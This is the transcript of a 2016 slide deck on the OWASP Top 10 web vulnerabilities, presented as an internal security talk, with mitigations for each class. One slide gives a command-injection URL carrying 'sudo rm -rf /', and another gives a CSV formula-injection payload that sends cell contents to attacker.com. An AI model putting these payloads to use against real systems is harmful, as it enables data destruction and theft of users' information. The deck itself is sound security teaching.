Upgrade to Pro — share decks privately, control downloads, hide ads and more …

Let's talk Security

Let's talk Security

Slides from Engineering Talkies at Wingify

Dheeraj Joshi

April 21, 2016
Tweet

More Decks by Dheeraj Joshi

Other Decks in Technology

Transcript

  1. Let’s talk Security
    Understanding, Exploiting and Defending against Top Web
    Vulnerabilities
    Dheeraj Joshi
    djadmin.in

    View Slide

  2. About Me
    I find security vulnerabilities for fun
    & swag and I wear White Hat.
    Uber, CKEditor, Dropbox,
    MailChimp, InVision, DigitalOcean,
    CloudFare, Intuit, Groupon, etc.
    What makes me happy?

    View Slide

  3. Security - Into The Details
    ● Owasp’s Top 10 Vulnerabilities
    ○ Explain
    ○ Impact
    ○ Defense
    ○ Real examples (External + Internal)
    ● Demo - RCE
    ● Q & A

    View Slide

  4. Why should Startups
    Care about Security?
    Startups & SMEs are impromptu
    for cutting corners. One of the
    first things they cut is ‘Security'.

    View Slide

  5. View Slide

  6. HACKER PUTS HOSTING SERVICE CODE
    SPACES OUT OF BUSINESS
    The Shutdown

    View Slide

  7. OWASP Top 10 And Beyond

    View Slide

  8. INJECTION

    View Slide

  9. PREVENT INJECTION
    ● For databases use prepared statements
    ● Whitelist inputs wherever possible
    ● Sanitize inputs (use filter extension)
    ● Don’t trust user input and always verify!

    View Slide

  10. Example
    Google Command Injection
    We can include any command in the URL below
    https://console.cloud.google.com/home/dashboard?
    project=;sudo rm -rf /
    Found by an Indian Security Researcher (S. Venkatesh)

    View Slide

  11. Exploiting ‘Export as CSV’ functionality
    Formula
    Injection
    =HYPERLINK("http://attacker.com?leak="&A1&A2,"Error: please
    click for further information")
    Fix - Append a single quote (‘) to the list of formula triggers ( =, +, -)
    If victim clicks this cell, they will inadvertently exfiltrate the contents of
    cells A1 and A2 to attacker website, which may include other users’
    sensitive information.

    View Slide

  12. BROKEN AUTHENTICATION AND SESSION
    MANAGEMENT

    View Slide

  13. MITIGATION
    ● Enforce strong password policy
    ● Require periodic reset of password
    ● Use 2 factor authentication
    ● Use SSL and secure flag on cookies
    ● Don’t neglect failed-login detection & tracking
    ● Only use httpOnly cookies

    View Slide

  14. CROSS SITE SCRIPTING - XSS
    ● XSS attack users
    ● “Javascript Injection”
    ● Exploits can be bad,
    really bad..

    View Slide

  15. What is XSS?
    Typical Reflected XSS

    View Slide

  16. Stored XSS

    View Slide

  17. DOM XSS

    View Slide

  18. Protect Yourself
    ● Use filter extension to filter
    inputs
    ● Ensure that outputs are HTML
    encoded
    ● Don’t reinvent the wheel
    ● Don’t consider any part of the
    request as being “safe”

    View Slide

  19. ngBind attribute
    $sanitize - service in module ngSanitize
    Sanitizes an html string by stripping all potentially dangerous tokens.

    View Slide

  20. INSECURE DIRECT OBJECT
    REFERENCES

    View Slide

  21. Scenario / Exploit
    1) First, an attacker signup for an account and request ”forgot
    password”.
    2) You will receive a link :
    https://vimeo.com/forgot_password/[user id]/[token]

    View Slide

  22. Prevention
    ● Low level access controls
    ● Prevent user input in file/URL access
    commands
    ● No unsanitized input to execution
    commands

    View Slide

  23. SECURITY
    MISCONFIGURATION

    View Slide

  24. PREVENTION > CURE
    ● Perform periodic security checks using
    automated tools
    ● Static Code Analysis
    ● Example : Hardening MySQL, Directory
    Listing, Auth Tokens

    View Slide

  25. SENSITIVE DATA EXPOSURE
    ● Exposed PHP error messages
    ● Unencrypted sensitive data storage
    ● Not using SSL
    ● Example: a sensitive token should not be
    sent to external websites (Fitbit)

    View Slide

  26. MISSING FUNCTION LEVEL ACCESS CONTROL
    ● Valid input processing without access
    controls
    ● Decentralized access control layer
    ● Example : Profile email address not
    validated (Github), S3 configuration

    View Slide

  27. ● Don’t perform data changes on
    GET
    ● Use secure (csrf) tokens for
    POST
    ● Impact : Real bad, attack users
    ● Example : Dropbox,
    CodeSchool
    CROSS-SITE REQUEST
    FORGERY (CSRF)

    View Slide

  28. ● Not keeping libraries up-to-date
    ● *cough*Wordpress*cough*
    ● Example : Third-Party Libraries (Apache CXF
    Authentication Bypass, Spring RCE)
    USING COMPONENTS WITH
    KNOWN VULNERABILITIES

    View Slide

  29. UNVALIDATED REDIRECTS AND
    FORWARDS
    ● Header Injection
    ● JavaScript Parameter Injection
    ● Reliance on HTTP_REFERER
    ● Abuse window opener
    (Facebook)

    View Slide

  30. Example : Dropbox Open Redirect in v1 API

    View Slide

  31. Remote Code Execution

    View Slide

  32. The solution
    ● Reset all passwords and
    keys
    ● Remove backdoors (not
    easy)
    OR
    Destroy everything??

    View Slide

  33. Thank you
    References :
    ● https://www.owasp.org
    ● https://djadmin.in/pwn/ (tools)

    View Slide